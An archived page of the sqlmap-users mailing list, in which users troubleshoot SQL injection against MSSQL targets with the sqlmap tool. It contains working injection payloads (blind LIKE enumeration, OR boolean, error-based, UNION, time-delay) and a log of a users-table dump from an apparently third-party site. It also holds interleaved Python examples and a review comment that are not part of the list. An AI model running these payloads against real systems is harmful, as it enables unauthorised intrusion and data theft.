sqlmap-users Mailing List for sqlmap (Page 30)
From: Miroslav S. <mir...@gm...> - 2013-10-17 13:51:03
Hi Robert.

In this kind of situations where "there are a number of filters confounding the effort, including certain character sequences, query length" we can't help you. sqlmap is an automated tool and automation is confronted to the wall in "special" situations.

I would suggest you to automate that "process" you've successfully used in some kind of a custom script.

Kind regards,
Miroslav Stampar

On Thu, Oct 17, 2013 at 12:56 AM, Robert Rich <rr...@gs...> wrote:

> I’ve got a case where I’m trying to enumerate MS SQL table names, but the user doesn’t have access to dbname..sysobjects. It does have access to INFORMATION.SCHEMA though.
>
> The vulnerability is a blind SQL and there are a number of filters confounding the effort, including certain character sequences, query length, etc.
>
> I’ve got a process working manually along the lines of (from memory, may not be 100%):
>
> VulnerableQueryParam=1550 AND (SELECT/**/COUNT(*) FROM INFORMATION.SCHEMA AS XYZ WHERE TABLE_CATALOG=CHAR(103)<snip>CHAR(98) AND TABLE_NAME LIKE [Test Case]) > 0
>
> Where [Test Case] is an iteration of
>
> CHAR(65)+CHAR(37) // A%
> CHAR(66)+CHAR(37) // B%
> CHAR(68)+CHAR(37) // C%
>
> I can tell by the output which are matching and which are not (elementary stuff, basically). Of course, once the first character is found, I repeat with known good characters at position 2:
>
> CHAR(103)+CHAR(65)+CHAR(37) // gA%
> CHAR(103)+CHAR(65)+CHAR(37) // gB%
>
> Is it possible for me to basically automate this with sqlmap? I can’t seem to get it to find this query using its own process. I’d like to just be able to put a ‘*’ or equivalent somewhere in the input URL to indicate where it should insert the CHAR() values, and pass it a --not-string in this case to distinguish true from false.
>
> Thanks for any input you can provide!
>
> Bob

--
Miroslav Stampar
http://about.me/stamparm
From: Marco M. <mm...@gm...> - 2013-10-17 09:44:24
Hi boys...

I was thinking of an innovation, you can change that when sqlmap enumerates the users (especially those of mysql) if found in the character meets a "@" try the next automatically with "localhost"?? for save times?

best regards
Marco Mirandola

2013/5/12 Miroslav Stampar <mir...@gm...>

> Hi Marcell.
>
> We can't include all those dependencies as it would make sqlmap package even bigger than it's now. Also, direct connection feature is an "optional" one.
>
> There could be (privilege?) complications with a PyMySQL setup.
>
> While you are not able to do the following command, you won't be able to properly run "-d" against MySQL:
>
> python -c "import pymysql"
>
> Optionally, you can try to run:
> python-sqlalchemy
>
> and rerun the -d... SQLAlchemy is an optional way how sqlmap handles direct connections.
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, May 12, 2013 at 9:53 AM, Marcell Fodor <fod...@gm...> wrote:
>
>> Heya,
>>
>> I needed direct access to mysql server and got error:
>> [03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party library in order to directly connect to the database MySQL. Download from 'https://github.com/petehunt/PyMySQL/'
>>
>> Now I got "This repository is temporarily unavailable." error and also tried to install like in this tutorial copy/pasted from web:
>>
>> Direct connection to the database
>> --------------------------------------------------
>>
>> Installing Py-MySQL Dependency
>>
>> git clone https://github.com/petehunt/PyMySQL/
>> cd PyMySQL
>> python setup.py install
>> cd ..
>> rm -rf PyMySQL
>>
>> ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
>>
>> First line fails.
>>
>> Would be great if this library was included in default install.
>>
>> Thanks in advance,
>>
>> Marcell
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Robert R. <rr...@gs...> - 2013-10-16 23:11:42
I've got a case where I'm trying to enumerate MS SQL table names, but the user doesn't have access to dbname..sysobjects. It does have access to INFORMATION.SCHEMA though.

The vulnerability is a blind SQL and there are a number of filters confounding the effort, including certain character sequences, query length, etc.

I've got a process working manually along the lines of (from memory, may not be 100%):

VulnerableQueryParam=1550 AND (SELECT/**/COUNT(*) FROM INFORMATION.SCHEMA AS XYZ WHERE TABLE_CATALOG=CHAR(103)<snip>CHAR(98) AND TABLE_NAME LIKE [Test Case]) > 0

Where [Test Case] is an iteration of

CHAR(65)+CHAR(37) // A%
CHAR(66)+CHAR(37) // B%
CHAR(68)+CHAR(37) // C%

I can tell by the output which are matching and which are not (elementary stuff, basically). Of course, once the first character is found, I repeat with known good characters at position 2:

CHAR(103)+CHAR(65)+CHAR(37) // gA%
CHAR(103)+CHAR(65)+CHAR(37) // gB%

Is it possible for me to basically automate this with sqlmap? I can't seem to get it to find this query using its own process. I'd like to just be able to put a '*' or equivalent somewhere in the input URL to indicate where it should insert the CHAR() values, and pass it a --not-string in this case to distinguish true from false.

Thanks for any input you can provide!

Bob
From: Miroslav S. <mir...@gm...> - 2013-10-15 17:18:14
Hi.

Sorry for the late reply. We are aware of the problem. It's the usage of HTML format in large dumps. We'll try to address it in next couple of days.

Kind regards,
Miroslav Stampar

On Oct 11, 2013 3:04 PM, "lenny ginn" <cl...@gm...> wrote:

> Hi ,
>
> I got the bug when i try to dump a big data here :
> i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at
> https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master
>
> sqlmap version: 1.0-dev
> Python version: 2.7.5
> Operating system: nt
> Command line: C:\Python27\sqlmap\sqlmap.py -u **********************************
> ********************** --random-agent --threads=7 --text-only -v 3 --d
> ump-format=html --dump-all
> Technique: ERROR
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "C:\Python27\sqlmap\sqlmap.py", line 95, in main
>     start()
>   File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in start
>     action()
>   File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action
>     conf.dbmsHandler.dumpAll()
>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in dumpAll
>     self.dumpTable()
>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in dumpTable
>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>   File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues
>     bodyNode.appendChild(rowNode)
>   File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild
>     _append_child(self, node)
>   File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child
>     childNodes.append(node)
> MemoryError
>
> [*] shutting down at 12:39:23
>
> Thanks you , i think problem is crash on memory setting
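The failure mode named in the reply above (an in-memory DOM holding every row of a large HTML dump) next to a row-at-a-time writer, as an added example that is not sqlmap's code. The function names, the column set and the constructed rows are assumptions made for illustration.

```python
import html
import os
import tempfile
import tracemalloc
from xml.dom import minidom

COLUMNS = ("id", "name", "note")


def sample_rows(n):
    """Constructed rows standing in for dumped table entries."""
    for i in range(n):
        yield (str(i), "user%d" % i, "<b>note & %d</b>" % i)


def dump_with_dom(columns, rows, path):
    """Build the whole table as a DOM, then serialize: memory grows per row."""
    doc = minidom.Document()
    table = doc.createElement("table")
    doc.appendChild(table)

    def add_row(values, tag):
        tr = doc.createElement("tr")
        for value in values:
            cell = doc.createElement(tag)
            cell.appendChild(doc.createTextNode(value))
            tr.appendChild(cell)
        table.appendChild(tr)  # every row stays referenced until the end

    add_row(columns, "th")
    for row in rows:
        add_row(row, "td")
    with open(path, "w", encoding="utf-8") as fh:
        table.writexml(fh)


def dump_streaming(columns, rows, path):
    """Write each row as soon as it arrives; nothing is kept after the write."""
    written = 0
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("<table>\n<tr>")
        fh.write("".join("<th>%s</th>" % html.escape(c) for c in columns))
        fh.write("</tr>\n")
        for row in rows:
            # Values are escaped, so dumped data cannot break the markup.
            cells = "".join("<td>%s</td>" % html.escape(v) for v in row)
            fh.write("<tr>%s</tr>\n" % cells)
            written += 1
        fh.write("</table>\n")
    return written


def peak_bytes(func, *args):
    """Peak Python heap usage (bytes) while func runs."""
    tracemalloc.start()
    try:
        func(*args)
        return tracemalloc.get_traced_memory()[1]
    finally:
        tracemalloc.stop()


def compare(n=20000):
    """Return (dom_peak, stream_peak, rows_in_streamed_file) for n rows."""
    with tempfile.TemporaryDirectory() as tmp:
        dom_path = os.path.join(tmp, "dom.html")
        stream_path = os.path.join(tmp, "stream.html")
        dom_peak = peak_bytes(dump_with_dom, COLUMNS, sample_rows(n), dom_path)
        stream_peak = peak_bytes(dump_streaming, COLUMNS, sample_rows(n), stream_path)
        with open(stream_path, encoding="utf-8") as fh:
            rows_in_file = fh.read().count("<tr>") - 1  # minus the header row
    return dom_peak, stream_peak, rows_in_file


if __name__ == "__main__":
    dom_peak, stream_peak, rows_in_file = compare()
    print("DOM peak:       %d KiB" % (dom_peak // 1024))
    print("streaming peak: %d KiB" % (stream_peak // 1024))
    print("rows written:   %d" % rows_in_file)
```

The DOM figure scales with the number of rows while the streaming figure stays roughly constant, which is why a sufficiently large dump ends in MemoryError only on the DOM path.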
From: Brandon P. <bpe...@gm...> - 2013-10-12 22:39:43
Sure thing, thanks a bunch!

On Sat, Oct 12, 2013 at 2:48 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Brandon.
>
> There is no such feature (at least for multipart cases).
>
> Nevertheless, I would suggest you to patch (just for this case):
>
> lib/request/connect.py (line 225):
> + post = post.replace("[RANDSTR]", randomStr()) if post else post
>
> Afterwards, you can put a [RANDSTR] mark into the request file itself at the place where you want a random value to be.
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Oct 11, 2013 at 5:23 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Hi, I have a request that posts multi-part form data to the server, and one of the params is vulnerable to a sqli. However, another param must change each request (can be totally random) and I am not sure how to approach that. I am sure that a tamper script or something will be the correct solution, just not sure how to approach it.
>>
>> Any thoughts or questions in case I did not explain it well? Basically, I would like to replace this param with a random uuid or something each request.
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2013-10-12 19:48:13
Hi Brandon.

There is no such feature (at least for multipart cases).

Nevertheless, I would suggest you to patch (just for this case):

lib/request/connect.py (line 225):
+ post = post.replace("[RANDSTR]", randomStr()) if post else post

Afterwards, you can put a [RANDSTR] mark into the request file itself at the place where you want a random value to be.

Kind regards,
Miroslav Stampar

On Fri, Oct 11, 2013 at 5:23 PM, Brandon Perry <bpe...@gm...> wrote:

> Hi, I have a request that posts multi-part form data to the server, and one of the params is vulnerable to a sqli. However, another param must change each request (can be totally random) and I am not sure how to approach that. I am sure that a tamper script or something will be the correct solution, just not sure how to approach it.
>
> Any thoughts or questions in case I did not explain it well? Basically, I would like to replace this param with a random uuid or something each request.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
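Review bot: on the added line for lib/request/connect.py, randomStr() is evaluated once per call to replace(), so a request file carrying more than one [RANDSTR] mark gets the same value at every occurrence within a request; if the fields must differ from each other, substitute per occurrence instead. The line also rewrites only post, so a mark placed in the URL or a header of the request file stays literal. The "[RANDSTR]" literal would be easier to maintain as a named constant, and since the patch gives only a line number with no context lines, it should name the revision it applies to.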
From: Brandon P. <bpe...@gm...> - 2013-10-11 15:59:58
FWIW here is what was happening when I tried to use eval:

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r ~/req2.req --level=3 -o --eval="import uuid;Name=str(uuid.uuid1())"

    sqlmap/1.0-dev-2dc570d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:58:56

[08:58:56] [INFO] parsing HTTP request from '/home/bperry/req2.req'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[08:58:59] [WARNING] you've provided target URL without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters through --data option
do you want to try URI injections in the target URL itself? [Y/n/q] n
[08:59:00] [INFO] testing connection to the target URL
[08:59:00] [CRITICAL] an error occurred while evaluating provided code ('can't assign to operator (<string>, line 1)').

[*] shutting down at 08:59:00

bperry@ubuntu:~/tools/sqlmap$

On Fri, Oct 11, 2013 at 10:23 AM, Brandon Perry <bpe...@gm...> wrote:

> Hi, I have a request that posts multi-part form data to the server, and one of the params is vulnerable to a sqli. However, another param must change each request (can be totally random) and I am not sure how to approach that. I am sure that a tamper script or something will be the correct solution, just not sure how to approach it.
>
> Any thoughts or questions in case I did not explain it well? Basically, I would like to replace this param with a random uuid or something each request.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2013-10-11 15:23:49
Hi, I have a request that posts multi-part form data to the server, and one of the params is vulnerable to a sqli. However, another param must change each request (can be totally random) and I am not sure how to approach that. I am sure that a tamper script or something will be the correct solution, just not sure how to approach it.

Any thoughts or questions in case I did not explain it well? Basically, I would like to replace this param with a random uuid or something each request.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: lenny g. <cl...@gm...> - 2013-10-10 19:57:40
Hi ,

I got the bug when i try to dump a big data here :
i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at
https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master

sqlmap version: 1.0-dev
Python version: 2.7.5
Operating system: nt
Command line: C:\Python27\sqlmap\sqlmap.py -u **********************************
********************** --random-agent --threads=7 --text-only -v 3 --d
ump-format=html --dump-all
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "C:\Python27\sqlmap\sqlmap.py", line 95, in main
    start()
  File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in start
    action()
  File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action
    conf.dbmsHandler.dumpAll()
  File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in dumpAll
    self.dumpTable()
  File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in dumpTable
    conf.dumper.dbTableValues(kb.data.dumpedTable)
  File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues
    bodyNode.appendChild(rowNode)
  File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild
    _append_child(self, node)
  File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child
    childNodes.append(node)
MemoryError

[*] shutting down at 12:39:23

Thanks you , i think problem is crash on memory setting
From: Miroslav S. <mir...@gm...> - 2013-10-04 09:09:56
On Fri, Oct 4, 2013 at 9:27 AM, Raphael GONZALEZ <rap...@gm...> wrote:

> Hi,
>
> Thanks a lot.
> Yes with * it's easier than with prefix/suffix
>
> ... but I'm not sure I was clear enough because my problem is still there :)
>
> Here is my Request :
>
> POST target_url
> ...
>
> param=&other_param=...
>
> if param
> - is empty,
> - or contains a number
> - or contains a select sub-statement that returns a number
> => returns 200 with other info
>
> if param
> - contains a string
> - or contains a select sub-statement that returns a string
> => returns 302 to error page
>
> so using the * I still get some strange payload , for example
> [PAYLOAD] -9402 OR (9544=9561)
>
> I think it comes from the "<where>2</where> in the payloads.xml file (for OR boolean-based blind)
> ... because if I add a test case with <where>1</where> then the generated payload seems ok (and then the blind injection is detected)

Point of the whole OR payload is to generate an "invalid/negative/non-original" response and to combine it with a inference (... OR A=B). That <where>2</where> is there on purpose -> to generate invalid/negative values in case of OR payloads.

> I have also a second problem
> when the response is 302, the error message is contained in the location (and also in the body as a HREF), as very often with asp
> (but if I follow the redirection the next page don't contains the message)

Have you tried without following the 302? sqlmap is asking you politely "do you want to follow".

> => so it's not detected because of URL encoded, specially "+" character)
>
> I can turn around this by using a proxy and modifying the response before it returns to sqlmap but it would be more convenient to do that in sqlmap.
> Is there a way ? (for example and option similar to tamper to call a function on the response before it is processed by sqlmap)

In cases like this when case is seems to be specific, we encourage users to modify sqlmap to suit their needs and/or use (also) other tools.

> Thanks again
> Raphael

Bye

> On Wed, Oct 2, 2013 at 10:18 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> --prefix is a formation that is going in between of *value* and *payload*:
>>
>> ...=*value prefix payload*...
>>
>> This simply means that you've forgot for the complete *value* thing in your case.
>>
>> In your case usage of custom injection mark (*) is more appropriate:
>>
>> python sqlmap.py -u "www.target.com/vuln.php?param=(select name from sysusers where udi=-1 *)"
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...> wrote:
>>
>>> Hi,
>>>
>>> sqlmap/1.0-dev-25eca9d
>>>
>>> I don't manage to get Sqlmap generating the good payload !
>>>
>>> Here is my entry point :
>>> (dbms = MSSQL)
>>>
>>> I got this with manual tries in burp :
>>>
>>> param value : (select name from sysusers where udi=-1)
>>> - if the select returns no value => HTTP request returns 200
>>> - otherwise returns 302 to an error page
>>>
>>> so
>>> with param value : (select name from sysusers where udi=-1 or 1=1) => returns error
>>> with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200
>>>
>>> I thought I could make Sqlmap find a boolean based blind test with OR statements
>>> So I tried this command :
>>> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")"
>>>
>>> nothing is founded
>>> but when I look at generated payloads, I get
>>> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))
>>>
>>> so I always get a number generated before my command
>>>
>>> Where am I wrong ?
>>>
>>> Thanks
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Raphael G. <rap...@gm...> - 2013-10-04 07:27:47
Hi,

Thanks a lot.
Yes with * it's easier than with prefix/suffix

... but I'm not sure I was clear enough because my problem is still there :)

Here is my Request :

POST target_url
...

param=&other_param=...

if param
- is empty,
- or contains a number
- or contains a select sub-statement that returns a number
=> returns 200 with other info

if param
- contains a string
- or contains a select sub-statement that returns a string
=> returns 302 to error page

so using the * I still get some strange payload , for example
[PAYLOAD] -9402 OR (9544=9561)

I think it comes from the "<where>2</where> in the payloads.xml file (for OR boolean-based blind)
... because if I add a test case with <where>1</where> then the generated payload seems ok (and then the blind injection is detected)

I have also a second problem
when the response is 302, the error message is contained in the location (and also in the body as a HREF), as very often with asp
(but if I follow the redirection the next page don't contains the message)
=> so it's not detected because of URL encoded, specially "+" character)

I can turn around this by using a proxy and modifying the response before it returns to sqlmap but it would be more convenient to do that in sqlmap.
Is there a way ? (for example and option similar to tamper to call a function on the response before it is processed by sqlmap)

Thanks again
Raphael

On Wed, Oct 2, 2013 at 10:18 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> --prefix is a formation that is going in between of *value* and *payload*:
>
> ...=*value prefix payload*...
>
> This simply means that you've forgot for the complete *value* thing in your case.
>
> In your case usage of custom injection mark (*) is more appropriate:
>
> python sqlmap.py -u "www.target.com/vuln.php?param=(select name from sysusers where udi=-1 *)"
>
> Kind regards,
> Miroslav Stampar
>
> On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...> wrote:
>
>> Hi,
>>
>> sqlmap/1.0-dev-25eca9d
>>
>> I don't manage to get Sqlmap generating the good payload !
>>
>> Here is my entry point :
>> (dbms = MSSQL)
>>
>> I got this with manual tries in burp :
>>
>> param value : (select name from sysusers where udi=-1)
>> - if the select returns no value => HTTP request returns 200
>> - otherwise returns 302 to an error page
>>
>> so
>> with param value : (select name from sysusers where udi=-1 or 1=1) => returns error
>> with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200
>>
>> I thought I could make Sqlmap find a boolean based blind test with OR statements
>> So I tried this command :
>> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")"
>>
>> nothing is founded
>> but when I look at generated payloads, I get
>> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))
>>
>> so I always get a number generated before my command
>>
>> Where am I wrong ?
>>
>> Thanks
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2013-10-02 20:18:53
Hi.

--prefix is a formation that is going in between of *value* and *payload*:

...=*value prefix payload*...

This simply means that you've forgot for the complete *value* thing in your case.

In your case usage of custom injection mark (*) is more appropriate:

python sqlmap.py -u "www.target.com/vuln.php?param=(select name from sysusers where udi=-1 *)"

Kind regards,
Miroslav Stampar

On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...> wrote:

> Hi,
>
> sqlmap/1.0-dev-25eca9d
>
> I don't manage to get Sqlmap generating the good payload !
>
> Here is my entry point :
> (dbms = MSSQL)
>
> I got this with manual tries in burp :
>
> param value : (select name from sysusers where udi=-1)
> - if the select returns no value => HTTP request returns 200
> - otherwise returns 302 to an error page
>
> so
> with param value : (select name from sysusers where udi=-1 or 1=1) => returns error
> with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200
>
> I thought I could make Sqlmap find a boolean based blind test with OR statements
> So I tried this command :
> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")"
>
> nothing is founded
> but when I look at generated payloads, I get
> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))
>
> so I always get a number generated before my command
>
> Where am I wrong ?
>
> Thanks

--
Miroslav Stampar
http://about.me/stamparm
From: Raphael G. <rap...@gm...> - 2013-10-02 12:29:49
Hi,

sqlmap/1.0-dev-25eca9d

I don't manage to get Sqlmap generating the good payload !

Here is my entry point :
(dbms = MSSQL)

I got this with manual tries in burp :

param value : (select name from sysusers where udi=-1)
- if the select returns no value => HTTP request returns 200
- otherwise returns 302 to an error page

so
with param value : (select name from sysusers where udi=-1 or 1=1) => returns error
with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200

I thought I could make Sqlmap find a boolean based blind test with OR statements
So I tried this command :
./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")"

nothing is founded
but when I look at generated payloads, I get
[PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))

so I always get a number generated before my command

Where am I wrong ?

Thanks
From: Miroslav S. <mir...@gm...> - 2013-09-24 20:11:53
Hi.

Are you using the latest revision from our Github pages? There are two similar messages in the latest revision:

1) [WARNING] unknown web page charset '...'. Please report by email to ...
2) [ERROR] unknown charset '...'. Please visit ...

but none of those is the same as yours.

In case that the "message" is coming from the declared web page charset, and you said that the "meta" tag declared "iso-8859-1", there is a possibility that the problematic "it" is coming from the HTTP header "Content-type" (Content-type: ...charset=...).

Just to be clear, that charset name is really invalid. In these kind of cases we usually do some kind of patching (translation of those typos), but "it" doesn't really have a good substitute.

Also, that is just a warning message. Hence, sqlmap probably recognized a declared charset from mentioned meta tag afterwards.

Kind regards,
Miroslav Stampar

On Thu, Sep 19, 2013 at 12:54 PM, dark sea <dar...@go...> wrote:

> To whom it may concern.
>
> Hello there, today while I was testing a friend webpage I got the error:
> [WARNING] unknown charset 'it'
>
> the meta tag of the site:
>
> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
>
> Kind Regards,
>
> ds

--
Miroslav Stampar
http://about.me/stamparm
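The header-then-meta fallback discussed in the reply above, as an added example that is not sqlmap's code: the charset from the Content-Type header is tried first, a name Python has no codec for (such as 'it') produces a warning, and the meta tag declaration is used instead. The function names and the sample response are constructed for illustration.

```python
import codecs
import re

# The two places a response can declare its charset.
HEADER_CHARSET_RE = re.compile(r"charset\s*=\s*[\"']?([^\s\"';,]+)", re.I)
META_CHARSET_RE = re.compile(
    rb"<meta[^>]+charset\s*=\s*[\"']?([A-Za-z0-9._:\-]+)", re.I)


def valid_codec(name):
    """Return the canonical codec name, or None if Python has no such codec."""
    if not name:
        return None
    try:
        return codecs.lookup(name.strip()).name
    except LookupError:
        return None


def resolve_charset(content_type, body, default="utf-8"):
    """Pick a usable charset; returns (codec, source, warnings)."""
    candidates = []
    match = HEADER_CHARSET_RE.search(content_type or "")
    if match:
        candidates.append(("header", match.group(1)))
    # Only the start of the body is scanned; meta tags live in <head>.
    match = META_CHARSET_RE.search(body[:4096])
    if match:
        candidates.append(("meta", match.group(1).decode("ascii")))

    warnings = []
    for source, declared in candidates:
        codec = valid_codec(declared)
        if codec:
            return codec, source, warnings
        # Invalid declaration: warn and try the next source, do not abort.
        warnings.append("unknown charset '%s' (declared in %s)" % (declared, source))
    return default, "default", warnings


def decode_body(content_type, body):
    """Decode a response body with the resolved charset."""
    codec, source, warnings = resolve_charset(content_type, body)
    return body.decode(codec, errors="replace"), codec, source, warnings


# Constructed response matching the thread: invalid header charset,
# valid meta declaration, one ISO-8859-1 encoded byte in the body.
SAMPLE_HEADER = "text/html; charset=it"
SAMPLE_BODY = (
    b'<html><head><META http-equiv=Content-Type '
    b'content="text/html; charset=iso-8859-1"></head>'
    b'<body>Universit\xe0</body></html>'
)

if __name__ == "__main__":
    text, codec, source, warnings = decode_body(SAMPLE_HEADER, SAMPLE_BODY)
    for warning in warnings:
        print("[WARNING]", warning)
    print("decoded with %s (from %s)" % (codec, source))
```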
From: Miroslav S. <mir...@gm...> - 2013-09-23 18:59:23
|
Hi.

You haven't included request.txt into your email. It would be of great help to see what was the content of it. I said that because this feature normally works out of the box.

Kind regards,
Miroslav Stampar

On Mon, Sep 23, 2013 at 4:24 PM, Jacco van Tuijl <jac...@gm...> wrote:
> request.txt is an HTTP request from Burp. I've added a star in the request body because that is where the injection is.
> when using "sqlmap.py -r request.txt"
> No payload is injected into the request.
> Also when using the -v 6 option it is not showing the [PAYLOAD] line e.g.:
> [16:18:36] [PAYLOAD] ) AND 4129=1138 AND (5586=5586

--
Miroslav Stampar
http://about.me/stamparm |
From: Jacco v. T. <jac...@gm...> - 2013-09-23 14:25:02
|
request.txt is an HTTP request from Burp. I've added a star in the request body because that is where the injection is.
when using "sqlmap.py -r request.txt"
No payload is injected into the request.
Also when using the -v 6 option it is not showing the [PAYLOAD] line e.g.:
[16:18:36] [PAYLOAD] ) AND 4129=1138 AND (5586=5586 |
From: Miroslav S. <mir...@gm...> - 2013-09-21 10:25:27
|
Hi.

This should be fixed now.

Bye

--
Miroslav Stampar
http://about.me/stamparm |
From: 沸水浮冰 <sf...@gm...> - 2013-09-21 02:55:29
|
root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C '最后登录时间' --dump --hex -v 3

sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:51:25

[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter values ('major=')waitfor delay'0:0:20'--') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: major
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND ('IRZo'='IRZo&station=&idxpage=2&ptopid=
    Vector: OR ([INFERENCE])

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: classid=&specialid=2&qstr=&major=-3052') OR 5359=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (5359=5359) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND ('PLJO'='PLJO&station=&idxpage=2&ptopid=
    Vector: OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: UNION query
    Title: Generic UNION query (random number) - 16 columns
    Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654-- &station=&idxpage=2&ptopid=
    Vector: UNION ALL SELECT [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
---
[00:51:49] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
